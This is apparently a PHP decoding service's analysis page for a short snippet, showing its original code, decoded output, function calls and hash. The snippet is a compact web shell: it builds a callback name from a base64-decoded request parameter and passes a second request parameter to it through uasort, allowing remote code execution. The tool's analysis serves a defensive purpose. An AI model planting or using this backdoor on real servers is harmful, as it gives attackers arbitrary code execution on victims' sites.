Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $e = $_REQUEST['e']; $arr = array('test', $_REQUEST['pass']); uasort($arr, bas..

Decoded Output download

<?php 
	$e = $_REQUEST['e']; 
	$arr = array('test', $_REQUEST['pass']); 
	uasort($arr, base64_decode($e)); 
?>

Did this file decode correctly?

Original Code

<?php
	$e = $_REQUEST['e'];
	$arr = array('test', $_REQUEST['pass']);
	uasort($arr, base64_decode($e));
?>

Function Calls

base64_decode 1

Variables

$e None
$arr [{'key': 0, 'value': 'test'}, {'key': 1, 'value': None}]

Stats

MD5 04a89bf95abb420c0eb3632654ec6a17
Eval Count 0
Decode Time 112 ms